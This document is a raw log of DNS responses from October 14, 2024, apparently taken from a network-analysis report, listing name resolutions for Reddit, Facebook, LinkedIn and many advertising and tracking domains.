                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.348800898 CEST1.1.1.1192.168.2.70xb4bfNo error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.348800898 CEST1.1.1.1192.168.2.70xb4bfNo error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.348800898 CEST1.1.1.1192.168.2.70xb4bfNo error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.348800898 CEST1.1.1.1192.168.2.70xb4bfNo error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.348990917 CEST1.1.1.1192.168.2.70x9732No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.356062889 CEST1.1.1.1192.168.2.70x41dfNo error (0)js.hs-scripts.com104.16.141.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.356062889 CEST1.1.1.1192.168.2.70x41dfNo error (0)js.hs-scripts.com104.16.139.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.356062889 CEST1.1.1.1192.168.2.70x41dfNo error (0)js.hs-scripts.com104.16.138.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.356062889 CEST1.1.1.1192.168.2.70x41dfNo error (0)js.hs-scripts.com104.16.140.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.356062889 CEST1.1.1.1192.168.2.70x41dfNo error (0)js.hs-scripts.com104.16.137.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.357095957 CEST1.1.1.1192.168.2.70x520fNo error (0)js.hs-scripts.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.359767914 CEST1.1.1.1192.168.2.70x645aNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.359767914 CEST1.1.1.1192.168.2.70x645aNo error (0)scontent.xx.fbcdn.net157.240.251.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.360589981 CEST1.1.1.1192.168.2.70xfd13No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.360589981 CEST1.1.1.1192.168.2.70xfd13No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.360589981 CEST1.1.1.1192.168.2.70xfd13No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.409468889 CEST1.1.1.1192.168.2.70xe0bdNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.409468889 CEST1.1.1.1192.168.2.70xe0bdNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.409513950 CEST1.1.1.1192.168.2.70xb798No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.409513950 CEST1.1.1.1192.168.2.70xb798No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425545931 CEST1.1.1.1192.168.2.70x35c1No error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425545931 CEST1.1.1.1192.168.2.70x35c1No error (0)d20519brkbo4nz.cloudfront.net99.86.4.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425545931 CEST1.1.1.1192.168.2.70x35c1No error (0)d20519brkbo4nz.cloudfront.net99.86.4.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425545931 CEST1.1.1.1192.168.2.70x35c1No error (0)d20519brkbo4nz.cloudfront.net99.86.4.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425545931 CEST1.1.1.1192.168.2.70x35c1No error (0)d20519brkbo4nz.cloudfront.net99.86.4.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.428349018 CEST1.1.1.1192.168.2.70x8523No error (0)tools.luckyorange.comd20519brkbo4nz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.432429075 CEST1.1.1.1192.168.2.70xbdf5No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.432429075 CEST1.1.1.1192.168.2.70xbdf5No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.432429075 CEST1.1.1.1192.168.2.70xbdf5No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.432429075 CEST1.1.1.1192.168.2.70xbdf5No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.432429075 CEST1.1.1.1192.168.2.70xbdf5No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.433849096 CEST1.1.1.1192.168.2.70x29b3No error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.513315916 CEST1.1.1.1192.168.2.70xa72fNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.513315916 CEST1.1.1.1192.168.2.70xa72fNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.513315916 CEST1.1.1.1192.168.2.70xa72fNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.513315916 CEST1.1.1.1192.168.2.70xa72fNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.513315916 CEST1.1.1.1192.168.2.70xa72fNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.513987064 CEST1.1.1.1192.168.2.70xed4eNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.553514957 CEST1.1.1.1192.168.2.70x1cb6No error (0)googleads.g.doubleclick.net142.250.181.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.568249941 CEST1.1.1.1192.168.2.70x1110No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.213463068 CEST1.1.1.1192.168.2.70x63ddNo error (0)d.adroll.comadserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.213463068 CEST1.1.1.1192.168.2.70x63ddNo error (0)adserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.com3.248.68.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.213463068 CEST1.1.1.1192.168.2.70x63ddNo error (0)adserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.com108.128.74.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.214723110 CEST1.1.1.1192.168.2.70xa407No error (0)d.adroll.comadserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.229345083 CEST1.1.1.1192.168.2.70x5736No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.229345083 CEST1.1.1.1192.168.2.70x5736No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.229345083 CEST1.1.1.1192.168.2.70x5736No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com34.251.125.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.229345083 CEST1.1.1.1192.168.2.70x5736No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com54.72.14.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.229345083 CEST1.1.1.1192.168.2.70x5736No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com63.33.18.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.236747026 CEST1.1.1.1192.168.2.70x841No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.236747026 CEST1.1.1.1192.168.2.70x841No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.269476891 CEST1.1.1.1192.168.2.70xe06eNo error (0)settings.luckyorange.com34.107.203.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.284683943 CEST1.1.1.1192.168.2.70x7f40No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.285383940 CEST1.1.1.1192.168.2.70xc2d1No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.112672091 CEST1.1.1.1192.168.2.70x26c4No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.112672091 CEST1.1.1.1192.168.2.70x26c4No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.112672091 CEST1.1.1.1192.168.2.70x26c4No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com54.72.14.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.112672091 CEST1.1.1.1192.168.2.70x26c4No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com63.33.18.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.112672091 CEST1.1.1.1192.168.2.70x26c4No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com34.251.125.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.113693953 CEST1.1.1.1192.168.2.70xf64fNo error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.113693953 CEST1.1.1.1192.168.2.70xf64fNo error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.169497013 CEST1.1.1.1192.168.2.70xa088Server failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.190665960 CEST1.1.1.1192.168.2.70x6c4eNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.190665960 CEST1.1.1.1192.168.2.70x6c4eNo error (0)star-mini.c10r.facebook.com157.240.252.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.190684080 CEST1.1.1.1192.168.2.70x1df8No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206290007 CEST1.1.1.1192.168.2.70xdaaeNo error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206290007 CEST1.1.1.1192.168.2.70xdaaeNo error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206610918 CEST1.1.1.1192.168.2.70x43c3No error (0)x.adroll.comeu-west-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206610918 CEST1.1.1.1192.168.2.70x43c3No error (0)eu-west-1-x.adroll.comsludge-sludge-production-624682132.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206610918 CEST1.1.1.1192.168.2.70x43c3No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com34.251.125.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206610918 CEST1.1.1.1192.168.2.70x43c3No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com54.72.14.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.206610918 CEST1.1.1.1192.168.2.70x43c3No error (0)sludge-sludge-production-624682132.eu-west-1.elb.amazonaws.com63.33.18.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.040966034 CEST1.1.1.1192.168.2.70x331dNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.041055918 CEST1.1.1.1192.168.2.70x15dNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.041055918 CEST1.1.1.1192.168.2.70x15dNo error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.045242071 CEST1.1.1.1192.168.2.70xa33dNo error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.058180094 CEST1.1.1.1192.168.2.70x710dNo error (0)cm.g.doubleclick.net216.58.206.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.058731079 CEST1.1.1.1192.168.2.70x106cNo error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.058731079 CEST1.1.1.1192.168.2.70x106cNo error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.059636116 CEST1.1.1.1192.168.2.70x5621No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.073446989 CEST1.1.1.1192.168.2.70x8652No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.074033976 CEST1.1.1.1192.168.2.70x2574No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.098187923 CEST1.1.1.1192.168.2.70x49c8No error (0)idsync.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.798296928 CEST1.1.1.1192.168.2.70x19f3No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.798296928 CEST1.1.1.1192.168.2.70x19f3No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.174496889 CEST1.1.1.1192.168.2.70xe3ddNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.174524069 CEST1.1.1.1192.168.2.70xeebbNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.174524069 CEST1.1.1.1192.168.2.70xeebbNo error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.231935024 CEST1.1.1.1192.168.2.70xd5a9No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.232664108 CEST1.1.1.1192.168.2.70x90c9No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.294159889 CEST1.1.1.1192.168.2.70x6b23No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.294159889 CEST1.1.1.1192.168.2.70x6b23No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.294159889 CEST1.1.1.1192.168.2.70x6b23No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.294159889 CEST1.1.1.1192.168.2.70x6b23No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.310483932 CEST1.1.1.1192.168.2.70x3e71No error (0)dsum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.310483932 CEST1.1.1.1192.168.2.70x3e71No error (0)dsum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.310551882 CEST1.1.1.1192.168.2.70x76c2No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.118793964 CEST1.1.1.1192.168.2.70xd53No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.118793964 CEST1.1.1.1192.168.2.70xd53No error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.118793964 CEST1.1.1.1192.168.2.70xd53No error (0)nydc1.outbrain.org64.202.112.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.119499922 CEST1.1.1.1192.168.2.70xae7cNo error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.119499922 CEST1.1.1.1192.168.2.70xae7cNo error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.198170900 CEST1.1.1.1192.168.2.70x6c63No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.198170900 CEST1.1.1.1192.168.2.70x6c63No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.198170900 CEST1.1.1.1192.168.2.70x6c63No error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.198452950 CEST1.1.1.1192.168.2.70x79daNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.198452950 CEST1.1.1.1192.168.2.70x79daNo error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.467207909 CEST1.1.1.1192.168.2.70x6bd1No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.467207909 CEST1.1.1.1192.168.2.70x6bd1No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.561605930 CEST1.1.1.1192.168.2.70x2c40No error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.716589928 CEST1.1.1.1192.168.2.70x814cNo error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.716589928 CEST1.1.1.1192.168.2.70x814cNo error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.716589928 CEST1.1.1.1192.168.2.70x814cNo error (0)nydc1.outbrain.org64.202.112.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.717978954 CEST1.1.1.1192.168.2.70x919eNo error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.717978954 CEST1.1.1.1192.168.2.70x919eNo error (0)alldcs.outbrain.orgnydc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.977783918 CEST1.1.1.1192.168.2.70x94bNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.979882956 CEST1.1.1.1192.168.2.70x525dNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.979882956 CEST1.1.1.1192.168.2.70x525dNo error (0)dcs-ups.g03.yahoodns.netprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.979882956 CEST1.1.1.1192.168.2.70x525dNo error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.979882956 CEST1.1.1.1192.168.2.70x525dNo error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.979882956 CEST1.1.1.1192.168.2.70x525dNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.979882956 CEST1.1.1.1192.168.2.70x525dNo error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.019785881 CEST1.1.1.1192.168.2.70xdc37No error (0)sync.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.019785881 CEST1.1.1.1192.168.2.70xdc37No error (0)am-vip001.taboola.com141.226.228.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.021411896 CEST1.1.1.1192.168.2.70x50b6No error (0)sync.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.054792881 CEST1.1.1.1192.168.2.70x9f38No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.054792881 CEST1.1.1.1192.168.2.70x9f38No error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.054792881 CEST1.1.1.1192.168.2.70x9f38No error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.055301905 CEST1.1.1.1192.168.2.70x8819No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.055301905 CEST1.1.1.1192.168.2.70x8819No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.369788885 CEST1.1.1.1192.168.2.70xf970No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.369788885 CEST1.1.1.1192.168.2.70xf970No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:15.369788885 CEST1.1.1.1192.168.2.70xf970No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
